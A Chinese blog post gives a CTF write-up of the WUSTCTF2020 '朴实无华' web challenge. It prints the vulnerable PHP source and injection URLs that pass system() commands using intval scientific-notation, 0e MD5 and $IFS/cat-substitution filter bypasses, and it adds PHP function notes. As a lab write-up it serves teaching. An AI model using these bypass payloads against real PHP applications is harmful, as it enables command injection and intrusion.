命令执行 [WUSTCTF2020]朴实无华1

最新推荐文章于 2024-09-09 16:04:38 发布
最新推荐文章于 2024-09-09 16:04:38 发布
阅读量1k 收藏 20
点赞数 22
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/135185740
版权
文章讲述了在IT安全背景下,通过dirsearch工具扫描、抓包分析、编码修复等手段,逐步破解一个包含多个级别逻辑的PHP代码挑战,涉及isset、intval、MD5哈希以及字符串操作技巧,展示了代码审计和漏洞利用的实际应用过程。
摘要由CSDN通过智能技术生成

做题:

打开题目

我们用dirsearch扫描一下看看

扫描到有robots.txt,访问一下看看

 提示我们 /fAke_f1agggg.php

那就访问一下,不是真的flag

bp抓包一下

得到提示, /fl4g.php,访问一下看看

按alt,点击修复文字编码

就可以看到正常的代码了

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

代码审计

leve1

if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");

  • 首先检查是否设置了$_GET['num'],即是否有名为num的GET参数传递给脚本。
  • 如果存在num参数,将其赋值给变量$num
  • 使用intval()函数将$num转换为整数,并执行两个条件检查:
    • 如果$num的整数值小于2020,并且$num加1的整数值大于2021,则输出一条消息。
    • 否则,输出一条不同的消息。
  • 如果不存在num参数,则输出消息"去非洲吧"

level2

if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");

  1. 如果 md5 参数存在于 GET 请求中,则将其赋值给 $md5 变量。
  2. 接着,它检查 $md5 是否等于其自身的 MD5 哈希值。
  3. 如果相等,则输出一段文本,描述了一个人在拿到某个标志后的行为。
  4. 如果不相等,则输出另一段文本。
  5. 如果 md5 参数不存在于 GET 请求中,则输出一段提示文本。

get flag

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

  1. isset($_GET['get_flag']) 检查是否存在名为 get_flag 的 GET 参数。
  2. 如果参数存在,则将其值赋给 $get_flag 变量。
  3. 然后,代码使用 strstr() 函数检查 $get_flag 中是否包含空格,如果不包含空格,则继续执行。
  4. 如果 $get_flag 中不包含空格,则使用 str_ireplace() 函数将其中的 "cat" 替换为 "wctf2020"。
  5. 接着,代码调用 system() 函数执行 $get_flag 中的命令。
  6. 如果 $get_flag 中包含空格,则直接输出错误消息 "快到非洲了"。

第一个

我们要让num参数的值小于2020,但是加1的值大于2021,这里涉及到intval函数的科学计数法绕过,我们让num=2e4

第二个

要求本身和md5值相同,我们直接用md5=0e215962017

第三个

要绕过cat和空格的过滤

代替cat: more、less、head、tail、sort、ca\t
代替空格:$IFS、${IFS}、$IFS$1、$IFS$9

所以我们先用 ls 命令

/fl4g.php?num=2e4&md5=0e215962017&get_flag=ls

/fl4g.php?num=2e4&md5=0e215962017&get_flag=more${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

得到flag

总结:

知识点:

isset函数

isset() 函数可以检测「变量是否存在」并非NULL。常用来判断变量是否被定义

intval函数

intval() 函数用于获取变量的整数值

语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明:
  • $var:要转换成 integer 的数量值。
  • $base:转化所使用的进制。

如果 base 是 0,通过检测 var 的格式来决定使用的进制:

  • 如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
  • 如果字符串以 "0" 开始,使用 8 进制(octal);否则,
  • 将使用 10 进制
看实例
<?php
echo intval(4.2);                     // 4
echo intval('42');                    // 42
echo intval('-42');                   // -42
echo intval(042);                     // 34
echo intval('042');                   // 42
echo intval(0x1A);                    // 26
echo intval(42, 8);                   // 42
echo intval('42', 8);                 // 34
echo intval(array());                 // 0
?>

(实例后面几个我也不是很懂,看了chat8的解释也不是很理解,就暂时在这里存个疑问?)

intval函数之科学技术法绕过

intval函数遇到科学计数法(只适用php7.0以下的版本)

当函数中用字符串方式表示科学计数法时,函数的返回值是科学计数法前面的一个数

而对于科学计数法加数字则会返回科学计数法的数值

<?php
echo intval("2e5"+1);     //200001
echo intval(2e5+1);       //200001
echo intval("2e5");       //2
echo intval(2e5);         //20000
?>

应用场景:

 if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024)

strstr函数

strstr() 函数搜索一个字符串在另一个字符串中的第一次出现,找到所搜索的字符串,则该函数返回第一次匹配的字符串的地址

区分大小写

语法

  char *strstr(char *str1, const char *str2);   //返回值为字符型指针
  str1: 被查找目标
  str2: 要查找对象

stristr函数

这个函数其实和strstr函数的功能差不多,差别就在查找的时候返回的是剩余的字符串不区分大小写

实例

str_ireplace函数

相当于一个查找,然后替换的函数

实例

把字符串 "Hello world!" 中的字符 "WORLD"(不区分大小写)替换成 "hhh":

知识点源于:

https://www.cnblogs.com/-chenxs/p/11978488.html#:~:text=%E5%81%87%E8%AE%BE%E8%BF%87%E6%BB%A4%E4%BA%86cat%201.%E5%88%A9%E7%94%A8%E5%8F%98%E9%87%8F%E7%BB%95%E8%BF%87%EF%BC%9A,ac%3Bb%3Dat%3B%24a%24b%202.%E5%88%A9%E7%94%A8base%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87

intval()函数绕过_intval($_get['lover'] + 1) > 2024)-CSDN博客

PHP str_ireplace() 函数

strstr()函数的使用说明(C语言)_strstr()-CSDN博客

访白鹿
关注
  • 22
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU刷题记6
Kanyun的博客
08-05 252
科普:servlet:Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,用Java编写的服务器端程序,具有独立于平台和协议的特性,主要功能在于交互式地浏览和生成数据,生成动态Web内容。其实说明了这个就是JAVA源代码进行编译后所产生的后缀带有.class的东西。help的页面中存在一个filename参数的GET传参,可能存在文件下载漏洞。试用POST方式来进行请求,发现可以下载文件。题目既然是与java相关的,之前了解到。.............
[WUSTCTF 2020]朴实无华
The_Epiphany的博客
03-07 1406
在本题中PHP版本为5.6.40,若传入value为“1e4”第一次会被识别为字符串,返回值为1,后+1时会被识别为数字,返回1e4+1。如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);如果字符串以 "0b" (或 "0B") 开头,使用 2 进制 (binary);如果字符串以 "0" 开始,使用 8 进制(octal);很综合的一道题,虽然比较简单,但是可以用来进行知识巩固,不多逼逼直接开始。弱相等,原理是比较时截断,前保留后丢弃。反斜线:即转义字符;
BUUCTF [WUSTCTF2020] 朴实无华
Senimo
12-16 1141
BUUCTF [WUSTCTF2020]朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据之前的Warning: 猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示: Look_at_me: /fl4g.p
[WUSTCTF2020]朴实无华 1
plant1234的博客
06-03 348
首先打开题目得到: 扫描目录发现有robots.txt文件访问: 访问:发现是假的:查看消息头发现:访问发现是代码审计: 乱码但是可以调整编码:得到: 进行代码审计: 发现有system($get_flag);执行命令 但要绕过条件第一个要绕过:intval($num) < 2020 && intval($num + 1) > 2021可以利用科学计算法来绕过:num=55e4intval()返回字符前的数字,就是55小于2020但有运算时把科学计算55e4转化为550000+1=550001,大于202
[WUSTCTF2020]朴实无华
zxnimud5的专栏
09-12 245
浏览器标题有乱码 编码调成unicode robots.txt : /fAke_f1agggg.php 访问后啥也没有 用burp看 这里必须采用代理拦截 不拦截啥都看不到 burp里右边响应头里有提示,/fl4g.php 然后代码审计 //level1 if(isset($_GET['num'])){ $num=$_GET['num']; if(intval($num)<2020&&intval($num+1)...
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 661
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4623
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
从状态管理到性能优化:全面解析 Android Compose
陆业聪
09-09 914
本文详细介绍了 Android Compose,一个现代化的 UI 框架,强调其声明式、简洁和可组合性的优势。文章探讨了状态管理、列表处理和性能优化,旨在帮助开发者有效利用 Compose 构建高效的 Android 应用。
4-1.Android Camera 之 CameraInfo 编码模板(前后置摄像头理解、摄像头图像的自然方向理解)
weixin_52173250的博客
09-05 1257
前置摄像头也是横向安装的,前置摄像头与后置摄像头的一个关键区别在于它在预览时会对图像进行镜像处理,即左右镜像处理把 orientation 为 270 处理成 orientation 为 90。大多数 Android 设备的后置摄像头是横向安装的,因此相机传感器采集的图像需要旋转才能与屏幕方向一致。:表示摄像头图像的自然方向(逆时针),通常会根据它在显示图像时对其进行适当的旋转。:表示设备的前置摄像头,手机屏幕上的。:表示摄像头镜头的方向,它的值可能是。:表示设备的后置摄像头,手机背后的。
案例——Mysql主从复制与读写分离
shuaianm的博客
09-05 1722
读写分离,基本的原理是让主数据库处理事务性增、改、删操作(INSERT、UPDATE、DELETE),而从 数据库处理SELECT查询操作。数据库复制被用来把事务性操作导致的变更同步到集群中的从数据库。
Android13默认开启电池百分比数字显示Framework
技术的积累,其实就是财富的积累呀。
09-05 342
通过,0,1 的切换,可以修改默认显示电池数字百分比,或不显示电池数字百分比的效果。修改2个地方,一个是Setting,一个是SystemUI显示。通过查阅Framework代码。终于找到了如何默认显示。查了很多平台,就是没有Android13的。有个小需求,需要实现。
Android】ViewPager基本用法总结
Patrick_yuxuan的博客
09-06 1132
ViewPager是 Android 中一个用于在同一屏幕上滑动不同页面(通常是左右滑动)的组件。它通常用于实现多页面滑动效果,比如应用的引导页、图片轮播、以及支持标签导航的界面。ViewPager与结合使用。是一个适配器,它负责为ViewPager提供页面内容。每个页面通常是一个Fragment,也可以是一个普通的View。
RK3566/RK3568 Android 11 动态禁止/启用APP
qq_23921815的博客
09-04 404
RK3566/RK3568 Android 11 定制大全在系统服务中增加动态禁止/启用应用。
Android 应用程序中判断用户是否在国内
LLZjiayou的博客
09-05 557
要在 Android 应用程序中判断用户是否在国内,并根据地理位置进行不同的操作,你可以使用Locale类和类来检测用户的国家/地区,或者使用 IP 地址进行地理定位。以下是一个简单的 Java 代码示例,它根据用户是否在中国来做出不同的操作。
charles配置安卓抓包(避坑版)
qq_43557600的博客
09-08 355
B版块(证书安装到System,能抓更多的包)A版块(证书安装到user)
Android 9.0 增加interface audio接口,解决编译报错
qq_48192676的博客
09-05 945
其实报错信息有让你去跑一个脚本,之前我也有试过,始终跑不过,找了很多资料,结果少了-products xxx // xxx为boardname,敲如下命令就build pass了,上code到服务器,完美~执行命令:sha256sum ./audio/common/5.0/types.hal ,这里修改那个*.hal文件,就执行 sha256sum xx/xx/xx/*.hal。下面是我新生成的哈希值,发现这个值和上面error的值一样,也许编译时已经计算出。他会换原先的,重新编译后通过。
MapBox Android版开发 4 国际化功能v11
最新发布
程序喵D的博客
09-09 813
在前文MapBox地图样式v11中,使用Style的方法本地化地图语言。但样式和样式仍显示英文。本文将介绍MapBox国际化功能的使用方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值